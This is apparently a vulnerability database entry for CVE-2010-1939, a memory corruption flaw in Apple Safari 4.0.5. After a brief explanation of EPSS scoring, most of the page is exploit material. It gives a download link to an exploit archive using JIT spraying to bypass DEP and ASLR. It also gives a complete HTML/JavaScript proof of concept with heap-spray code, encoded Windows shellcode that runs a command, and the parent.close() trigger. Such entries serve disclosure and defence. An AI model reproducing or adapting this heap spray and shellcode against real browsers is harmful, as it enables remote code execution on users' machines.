CVE-2010-1939 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12614.zip (safari_parent_close_sintsov.zip) Unzip and run START.htm This exploit use JIT-SPRAY for DEP and ASLR bypass. jit-shellcode: system("notepad") 0day.html - use 0x09090101 address for CALL JITed shellcode. START.htm -> iff.htm -> if1.htm -> 0day.html | | | | JIT-SPRAY parent.close(); 0x09090101 - JITed * ESI=0x09090101 shellcode * CALL ESI By Alexey Sintsov from Digital Security Research Group [www.dsecrg.com]

<!-- Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit Bug discovered by Krystian Kloskowski (h07) <[email protected]> Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command (calc) Local: Yes Remote: Yes (POPUP must be enabled [Ctrl+Shift+K]) Just for fun ;) --> <!---------------------------------REMOTE.htm--------------------------------- <script> window.open("0day.htm"); //parent.close() activation self.close(); </script> -----------------------------------REMOTE.htm--------------------------------> <!---------------------------------0day.htm----------------------------------> <h1>Alt + F4 :)</h1> <script> function make_buf(payload, len) { while(payload.length < (len * 2)) payload += payload; payload = payload.substring(0, len); return payload; } var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc) "%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+ "%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+ "%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+ "%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+ "%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+ "%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+ "%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063"); bigblock = unescape("%u0D0D%u0D0D"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<1000;i++) memory[i] = block + shellcode; var a = parent; var buf = make_buf("AAAA", 10000); for(var i = 0; i <= 1; i++) { a.prompt(alert); a.prompt(buf); a.close(); } </script> <!---------------------------------0day.htm---------------------------------->